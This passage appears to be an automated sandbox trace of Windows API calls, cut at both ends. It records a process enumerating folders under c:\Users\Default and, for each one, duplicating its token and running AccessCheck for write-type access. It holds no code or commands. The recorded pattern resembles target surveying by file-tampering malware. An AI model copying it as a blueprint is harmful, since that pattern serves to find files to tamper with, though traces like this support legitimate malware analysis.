lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.355] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.355] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0 [0106.355] FindClose (in: hFindFile=0x5fc318 | out: hFindFile=0x5fc318) returned 1 [0106.355] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.355] FindFirstFileW (in: lpFileName="c:\\Users\\Default\\Documents\\*", lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0x5fc318 [0106.356] GetFileSecurityW (in: lpFileName="c:\\Users\\Default\\Documents", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281baf8) returned 0 [0106.356] GetLastError () returned 0x7a [0106.356] GetFileSecurityW (in: lpFileName="c:\\Users\\Default\\Documents", RequestedInformation=0x7, pSecurityDescriptor=0x28a44d0, nLength=0xc0, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x28a44d0, lpnLengthNeeded=0x281baf8) returned 1 [0106.356] GetLastError () returned 0x7a [0106.356] GetCurrentThread () returned 0xfffffffe [0106.356] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x0) returned 0 [0106.356] GetCurrentProcess () returned 0xffffffff [0106.356] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x33c) returned 1 [0106.356] DuplicateToken (in: ExistingTokenHandle=0x33c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281bafc | out: DuplicateTokenHandle=0x281bafc*=0x344) returned 1 [0106.356] MapGenericMask (in: AccessMask=0x281bb0c, GenericMapping=0x281badc | out: AccessMask=0x281bb0c) [0106.356] AccessCheck (in: pSecurityDescriptor=0x28a44d0, ClientToken=0x344, DesiredAccess=0x120116, GenericMapping=0x281badc, PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4 | out: PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4) returned 1 [0106.356] CloseHandle (hObject=0x344) returned 1 [0106.356] CloseHandle (hObject=0x33c) returned 1 [0106.356] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.356] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.356] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.356] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.356] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.356] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0 [0106.357] FindClose (in: hFindFile=0x5fc318 | out: hFindFile=0x5fc318) returned 1 [0106.357] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.357] FindFirstFileW (in: lpFileName="c:\\Users\\Default\\Downloads\\*", lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0x5fc318 [0106.357] GetFileSecurityW (in: lpFileName="c:\\Users\\Default\\Downloads", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281baf8) returned 0 [0106.357] GetLastError () returned 0x7a [0106.357] GetFileSecurityW (in: lpFileName="c:\\Users\\Default\\Downloads", RequestedInformation=0x7, pSecurityDescriptor=0x28a44d0, nLength=0xc0, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x28a44d0, lpnLengthNeeded=0x281baf8) returned 1 [0106.357] GetLastError () returned 0x7a [0106.357] GetCurrentThread () returned 0xfffffffe [0106.357] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x0) returned 0 [0106.357] GetCurrentProcess () returned 0xffffffff [0106.357] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x33c) returned 1 [0106.358] DuplicateToken (in: ExistingTokenHandle=0x33c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281bafc | out: DuplicateTokenHandle=0x281bafc*=0x344) returned 1 [0106.358] MapGenericMask (in: AccessMask=0x281bb0c, GenericMapping=0x281badc | out: AccessMask=0x281bb0c) [0106.358] AccessCheck (in: pSecurityDescriptor=0x28a44d0, ClientToken=0x344, DesiredAccess=0x120116, GenericMapping=0x281badc, PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4 | out: PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4) returned 1 [0106.358] CloseHandle (hObject=0x344) returned 1 [0106.358] CloseHandle (hObject=0x33c) returned 1 [0106.358] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.358] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.358] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0 [0106.358] FindClose (in: hFindFile=0x5fc318 | out: hFindFile=0x5fc318) returned 1 [0106.358] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.358] FindFirstFileW (in: lpFileName="c:\\Users\\Default\\Favorites\\*", lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0x5fc318 [0106.359] GetFileSecurityW (in: lpFileName="c:\\Users\\Default\\Favorites", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281baf8) returned 0 [0106.359] GetLastError () returned 0x7a [0106.359] GetFileSecurityW (in: lpFileName="c:\\Users\\Default\\Favorites", RequestedInformation=0x7, pSecurityDescriptor=0x28a44d0, nLength=0xc0, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x28a44d0, lpnLengthNeeded=0x281baf8) returned 1 [0106.359] GetLastError () returned 0x7a [0106.359] GetCurrentThread () returned 0xfffffffe [0106.359] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x0) returned 0 [0106.359] GetCurrentProcess () returned 0xffffffff [0106.359] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x33c) returned 1 [0106.359] DuplicateToken (in: ExistingTokenHandle=0x33c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281bafc | out: DuplicateTokenHandle=0x281bafc*=0x344) returned 1 [0106.360] MapGenericMask (in: AccessMask=0x281bb0c, GenericMapping=0x281badc | out: AccessMask=0x281bb0c) [0106.360] AccessCheck (in: pSecurityDescriptor=0x28a44d0, ClientToken=0x344, DesiredAccess=0x120116, GenericMapping=0x281badc, PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4 | out: PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4) returned 1 [0106.360] CloseHandle (hObject=0x344) returned 1 [0106.360] CloseHandle (hObject=0x33c) returned 1 [0106.360] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.360] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.360] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.360] FindFirstFileW (in: lpFileName="c:\\Users\\Default\\Favorites\\Links\\*", lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0x5fc358 [0106.360] GetFileSecurityW (in: lpFileName="c:\\Users\\Default\\Favorites\\Links", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281b560) returned 0 [0106.360] GetLastError () returned 0x7a [0106.360] GetFileSecurityW (in: lpFileName="c:\\Users\\Default\\Favorites\\Links", RequestedInformation=0x7, pSecurityDescriptor=0x28ab8a8, nLength=0xb8, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x28ab8a8, lpnLengthNeeded=0x281b560) returned 1 [0106.360] GetLastError () returned 0x7a [0106.360] GetCurrentThread () returned 0xfffffffe [0106.360] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x0) returned 0 [0106.360] GetCurrentProcess () returned 0xffffffff [0106.360] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x344) returned 1 [0106.360] DuplicateToken (in: ExistingTokenHandle=0x344, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281b564 | out: DuplicateTokenHandle=0x281b564*=0x32c) returned 1 [0106.360] MapGenericMask (in: AccessMask=0x281b574, GenericMapping=0x281b544 | out: AccessMask=0x281b574) [0106.360] AccessCheck (in: pSecurityDescriptor=0x28ab8a8, ClientToken=0x32c, DesiredAccess=0x120116, GenericMapping=0x281b544, PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c | out: PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c) returned 1 [0106.360] CloseHandle (hObject=0x32c) returned 1 [0106.360] CloseHandle (hObject=0x344) returned 1 [0106.360] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.360] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.360] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.360] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0 [0106.360] FindClose (in: hFindFile=0x5fc358 | out: hFindFile=0x5fc358) returned 1 [0106.360] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.361] FindFirstFileW (in: lpFileName="c:\\Users\\Default\\Favorites\\Microsoft Websites\\*", lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0x5fc358 [0106.368] GetFileSecurityW (in: lpFileName="c:\\Users\\Default\\Favorites\\Microsoft Websites", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281b560) returned 0 [0106.368] GetLastError () returned 0x7a [0106.368] GetFileSecurityW (in: lpFileName="c:\\Users\\Default\\Favorites\\Microsoft Websites", RequestedInformation=0x7, pSecurityDescriptor=0x28ab8a8, nLength=0xb8, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x28ab8a8, lpnLengthNeeded=0x281b560) returned 1 [0106.368] GetLastError () returned 0x7a [0106.368] GetCurrentThread () returned 0xfffffffe [0106.369] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x0) returned 0 [0106.369] GetCurrentProcess () returned 0xffffffff [0106.369] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x344) returned 1 [0106.369] DuplicateToken (in: ExistingTokenHandle=0x344, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281b564 | out: DuplicateTokenHandle=0x281b564*=0x32c) returned 1 [0106.369] MapGenericMask (in: AccessMask=0x281b574, GenericMapping=0x281b544 | out: AccessMask=0x281b574) [0106.369] AccessCheck (in: pSecurityDescriptor=0x28ab8a8, ClientToken=0x32c, DesiredAccess=0x120116, GenericMapping=0x281b544, PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c | out: PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c) returned 1 [0106.369] CloseHandle (hObject=0x32c) returned 1 [0106.369] CloseHandle (hObject=0x344) returned 1 [0106.369] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.369] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.369] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.369] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.369] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.369] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.369] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0 [0106.369] FindClose (in: hFindFile=0x5fc358 | out: hFindFile=0x5fc358) returned 1 [0106.369] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.369] FindFirstFileW (in: lpFileName="c:\\Users\\Default\\Favorites\\MSN Websites\\*", lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0x5fc358 [0106.370] GetFileSecurityW (in: lpFileName="c:\\Users\\Default\\Favorites\\MSN Websites", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281b560) returned 0 [0106.371] GetLastError () returned 0x7a [0106.371] GetFileSecurityW (in: lpFileName="c:\\Users\\Default\\Favorites\\MSN Websites", RequestedInformation=0x7, pSecurityDescriptor=0x28ab8a8, nLength=0xb8, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x28ab8a8, lpnLengthNeeded=0x281b560) returned 1 [0106.371] GetLastError () returned 0x7a [0106.371] GetCurrentThread () returned 0xfffffffe [0106.371] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x0) returned 0 [0106.371] GetCurrentProcess () returned 0xffffffff [0106.371] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x344) returned 1 [0106.371] DuplicateToken (in: ExistingTokenHandle=0x344, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281b564 | out: DuplicateTokenHandle=0x281b564*=0x32c) returned 1 [0106.371] MapGenericMask (in: AccessMask=0x281b574, GenericMapping=0x281b544 | out: AccessMask=0x281b574) [0106.371] AccessCheck (in: pSecurityDescriptor=0x28ab8a8, ClientToken=0x32c, DesiredAccess=0x120116, GenericMapping=0x281b544, PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c | out: PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c) returned 1 [0106.371] CloseHandle (hObject=0x32c) returned 1 [0106.371] CloseHandle (hObject=0x344) returned 1 [0106.371] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.371] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.371] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.371] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.371] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.371] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.371] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.371] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0 [0106.371] FindClose (in: hFindFile=0x5fc358 | out: hFindFile=0x5fc358) returned 1 [0106.371] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.371] FindFirstFileW (in: lpFileName="c:\\Users\\Default\\Favorites\\Windows Live\\*", lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0x5fc358 [0106.377] GetFileSecurityW (in: lpFileName="c:\\Users\\Default\\Favorites\\Windows Live", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281b560) returned 0 [0106.377] GetLastError () returned 0x7a [0106.377] GetFileSecurityW (in: lpFileName="c:\\Users\\Default\\Favorites\\Windows Live", RequestedInformation=0x7, pSecurityDescriptor=0x28ab8a8, nLength=0xb8, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x28ab8a8, lpnLengthNeeded=0x281b560) returned 1 [0106.377] GetLastError () returned 0x7a [0106.377] GetCurrentThread () returned 0xfffffffe [0106.377] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x0) returned 0 [0106.377] GetCurrentProcess () returned 0xffffffff [0106.377] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x344) returned 1 [0106.377] DuplicateToken (in: ExistingTokenHandle=0x344, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281b564 | out: DuplicateTokenHandle=0x281b564*=0x32c) returned 1 [0106.377] MapGenericMask (in: AccessMask=0x281b574, GenericMapping=0x281b544 | out: AccessMask=0x281b574) [0106.378] AccessCheck (in: pSecurityDescriptor=0x28ab8a8, ClientToken=0x32c, DesiredAccess=0x120116, GenericMapping=0x281b544, PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c | out: PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c) returned 1 [0106.378] CloseHandle (hObject=0x32c) returned 1 [0106.378] CloseHandle (hObject=0x344) returned 1 [0106.378] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.378] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.378] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.378] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.378] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.378] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0 [0106.378] FindClose (in: hFindFile=0x5fc358 | out: hFindFile=0x5fc358) returned 1 [0106.378] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0 [0106.378] FindClose (in: hFindFile=0x5fc318 | out: hFindFile=0x5fc318) returned 1 [0106.378] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.378] FindFirstFileW (in: lpFileName="c:\\Users\\Default\\Links\\*", lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0x5fc318 [0106.379] GetFileSecurityW (in: lpFileName="c:\\Users\\Default\\Links", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281baf8) returned 0 [0106.380] GetLastError () returned 0x7a [0106.380] GetFileSecurityW (in: lpFileName="c:\\Users\\Default\\Links", RequestedInformation=0x7, pSecurityDescriptor=0x28a44d0, nLength=0xc0, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x28a44d0, lpnLengthNeeded=0x281baf8) returned 1 [0106.380] GetLastError () returned 0x7a [0106.380] GetCurrentThread () returned 0xfffffffe [0106.380] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x0) returned 0 [0106.380] GetCurrentProcess () returned 0xffffffff [0106.380] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x33c) returned 1 [0106.380] DuplicateToken (in: ExistingTokenHandle=0x33c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281bafc | out: DuplicateTokenHandle=0x281bafc*=0x344) returned 1 [0106.380] MapGenericMask (in: AccessMask=0x281bb0c, GenericMapping=0x281badc | out: AccessMask=0x281bb0c) [0106.380] AccessCheck (in: pSecurityDescriptor=0x28a44d0, ClientToken=0x344, DesiredAccess=0x120116, GenericMapping=0x281badc, PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4 | out: PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4) returned 1 [0106.380] CloseHandle (hObject=0x344) returned 1 [0106.380] CloseHandle (hObject=0x33c) returned 1 [0106.380] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.380] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.380] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.380] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.380] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.380] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.380] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0 [0106.380] FindClose (in: hFindFile=0x5fc318 | out: hFindFile=0x5fc318) returned 1 [0106.380] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.380] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.380] FindFirstFileW (in: lpFileName="c:\\Users\\Default\\Music\\*", lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0x5fc318 [0106.381] GetFileSecurityW (in: lpFileName="c:\\Users\\Default\\Music", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281baf8) returned 0 [0106.381] GetLastError () returned 0x7a [0106.381] GetFileSecurityW (in: lpFileName="c:\\Users\\Default\\Music", RequestedInformation=0x7, pSecurityDescriptor=0x28a44d0, nLength=0xc0, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x28a44d0, lpnLengthNeeded=0x281baf8) returned 1 [0106.381] GetLastError () returned 0x7a [0106.381] GetCurrentThread () returned 0xfffffffe [0106.381] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x0) returned 0 [0106.381] GetCurrentProcess () returned 0xffffffff [0106.381] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x33c) returned 1 [0106.381] DuplicateToken (in: ExistingTokenHandle=0x33c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281bafc | out: DuplicateTokenHandle=0x281bafc*=0x344) returned 1 [0106.381] MapGenericMask (in: AccessMask=0x281bb0c, GenericMapping=0x281badc | out: AccessMask=0x281bb0c) [0106.381] AccessCheck (in: pSecurityDescriptor=0x28a44d0, ClientToken=0x344, DesiredAccess=0x120116, GenericMapping=0x281badc, PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4 | out: PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4) returned 1 [0106.381] CloseHandle (hObject=0x344) returned 1 [0106.381] CloseHandle (hObject=0x33c) returned 1 [0106.381] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.381] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.381] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0 [0106.381] FindClose (in: hFindFile=0x5fc318 | out: hFindFile=0x5fc318) returned 1 [0106.381] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.381] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.381] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.381] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.381] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.381] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.381] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.381] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.381] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.381] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.381] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.381] FindFirstFileW (in: lpFileName="c:\\Users\\Default\\Pictures\\*", lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0x5fc318 [0106.382] GetFileSecurityW (in: lpFileName="c:\\Users\\Default\\Pictures", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281baf8) returned 0 [0106.382] GetLastError () returned 0x7a [0106.382] GetFileSecurityW (in: lpFileName="c:\\Users\\Default\\Pictures", 